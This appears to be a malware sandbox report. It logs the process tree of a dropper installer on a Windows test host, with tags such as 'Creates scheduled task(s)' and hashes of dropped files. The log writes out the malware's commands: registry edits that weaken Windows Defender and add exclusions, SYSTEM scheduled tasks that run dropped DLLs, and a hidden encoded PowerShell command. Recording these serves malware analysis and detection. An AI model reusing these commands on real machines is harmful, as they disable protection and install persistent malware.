C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\erzvrHvcaZerrtDXV\dMUiSaChFqmKilH\cjUBQYS.exeC:\Users\Admin\AppData\Local\Temp\erzvrHvcaZerrtDXV\dMUiSaChFqmKilH\cjUBQYS.exe hV /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SfrSbxhXbhVCC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SfrSbxhXbhVCC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dWSjIMqfbdUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dWSjIMqfbdUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jFRyDUODU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jFRyDUODU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jWYIfSfaEDaYgVKkjRR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jWYIfSfaEDaYgVKkjRR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oCfcnVibUgRU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oCfcnVibUgRU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wMiAwpnFkXrivKVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wMiAwpnFkXrivKVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\erzvrHvcaZerrtDXV\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\erzvrHvcaZerrtDXV\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\lhYCvcGAfKQiHdyz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\lhYCvcGAfKQiHdyz\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SfrSbxhXbhVCC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SfrSbxhXbhVCC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SfrSbxhXbhVCC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dWSjIMqfbdUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dWSjIMqfbdUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jFRyDUODU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jFRyDUODU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jWYIfSfaEDaYgVKkjRR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jWYIfSfaEDaYgVKkjRR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oCfcnVibUgRU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oCfcnVibUgRU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wMiAwpnFkXrivKVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wMiAwpnFkXrivKVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\erzvrHvcaZerrtDXV /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\erzvrHvcaZerrtDXV /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lhYCvcGAfKQiHdyz /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lhYCvcGAfKQiHdyz /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gxPFTwkiS" /SC once /ST 02:54:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gxPFTwkiS"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gxPFTwkiS"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZfXrITCAwqWWdJVle" /SC once /ST 04:36:31 /RU "SYSTEM" /TR "\"C:\Windows\Temp\lhYCvcGAfKQiHdyz\TUiVwphJwWVEcGl\tawQnMM.exe\" Rv /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ZfXrITCAwqWWdJVle"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\lhYCvcGAfKQiHdyz\TUiVwphJwWVEcGl\tawQnMM.exeC:\Windows\Temp\lhYCvcGAfKQiHdyz\TUiVwphJwWVEcGl\tawQnMM.exe Rv /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bNpHvRwEXzIclVjPnA"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\jFRyDUODU\PHErXK.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "bcMXixuPVnLBvIi" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bcMXixuPVnLBvIi2" /F /xml "C:\Program Files (x86)\jFRyDUODU\YOItBGr.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "bcMXixuPVnLBvIi"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bcMXixuPVnLBvIi"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BohWRrpvXkQUIE" /F /xml "C:\Program Files (x86)\oCfcnVibUgRU2\ioQojJk.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MHnDegfkwbmnw2" /F /xml "C:\ProgramData\wMiAwpnFkXrivKVB\XXWSrOR.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VEAFvbUpjoQCUTEsX2" /F /xml "C:\Program Files (x86)\jWYIfSfaEDaYgVKkjRR\qkmUJcE.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uvJLzDjkAdvbwQszjeG2" /F /xml "C:\Program Files (x86)\SfrSbxhXbhVCC\fkEKoFh.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kYTQWNyBMOqWrvtpH" /SC once /ST 00:17:25 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\lhYCvcGAfKQiHdyz\oPOCVhZS\sEgXgnq.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "kYTQWNyBMOqWrvtpH"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ZfXrITCAwqWWdJVle"2⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\lhYCvcGAfKQiHdyz\oPOCVhZS\sEgXgnq.dll",#1 /site_id 5254031⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\lhYCvcGAfKQiHdyz\oPOCVhZS\sEgXgnq.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "kYTQWNyBMOqWrvtpH"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\SfrSbxhXbhVCC\fkEKoFh.xmlFilesize
2KB
MD54ba0ad73cf6121e686335f6ff5ad64cb
SHA182187ee15ba007b9875698df56308cbaec016562
SHA256da8e34f7003bcb0eddd157952582e52f13cd20389b44107e1e20ea9d6f252f87
SHA512db6f9d4ddc44ef5ff96f36d432de10bb5f9880caf96025c3cf6500c952a864cced5ecaf11fbc9eefe07e6e7774346b2556b5e2e95b41964c513458d51126af53
-
C:\Program Files (x86)\jFRyDUODU\YOItBGr.xmlFilesize
2KB
MD50caf08032c3a07dea157cf5f8d2418f1
SHA1e8df86b5b47a149d5515c03cec5dcd9f747905c9
SHA256c585e7ac6d7b6255e06430334b56dcefabc050ed78916a1bb64b98340ddafa48
SHA5125dbd4eaffe513ae1849b52a6aff9a524f079563d1f096be7a0e5dda2c43274444f1a5d6b0e0e15944c8f6e964c2a10b5761ff43b862bb92bc18e4715b8b5b2af
-
C:\Program Files (x86)\jWYIfSfaEDaYgVKkjRR\qkmUJcE.xmlFilesize
2KB
MD5298ef2df78e6adaef7a0b9b261c1d1e8
SHA164c10eadcaef7c6ebc4dc5e66860f67a24fda401
SHA2569d85c12d7fbcd619131837d1f34394fc47e4c566330bfe491bf17245c35c6736
SHA512e4b688868f82e4306e21044daebe5a8948ac8e4839824f4f98025b329062d523637e609ac7921ca8d09769f793cf5600b966b602468c8adf3222821077dc589f
-
C:\Program Files (x86)\oCfcnVibUgRU2\ioQojJk.xmlFilesize
2KB
MD5e7dd97a326ad0d25e9c82abc3d289a45
SHA171b6e0974974a09ef5cb5c88324768ef7272093b
SHA2569a32a596f6363ec1d473ece5021f1c805bdadc152790bfd941222d98c8a64608
SHA512e2e525b21bb2960f7df940103f7533a7a009f3c23ee24b73eb8cf4e19075e3b573c3b97831f4d4825c7779508b0d7c1452bc50a2a69f5bc110e21119592e86ab
-
C:\ProgramData\wMiAwpnFkXrivKVB\XXWSrOR.xmlFilesize
2KB
MD5b077f0c4fa55a23e8cea96c0ff1eb2e7
SHA1bd054356d44f055189a7483723f501020587b00b
SHA256a61f229762cd1d5004b5400a7c23bf28949f8099c246a043193049ff0727139f
SHA51237737c7239ad28fb6d67232f130c78672c84dfa9040fc6908c48978eebc536bf7e7e37e6537c742d76e71bdecd98cf4b71c7038d706d3321ad1bb91a725eee94
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5a6c9d692ed2826ecb12c09356e69cc09
SHA1def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA5122f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3
-
C:\Users\Admin\AppData\Local\Temp\7zSD91F.tmp\Install.exeFilesize
6.3MB
MD509d5205a5e258e91e4f3035d5f031ac1
SHA16ff9223430ecb98cb01bc208503585e4701107dc
SHA256458af25f03fc83070641a8dd5b03ad990839c78cc97a4df3da6bbc2d40a52736
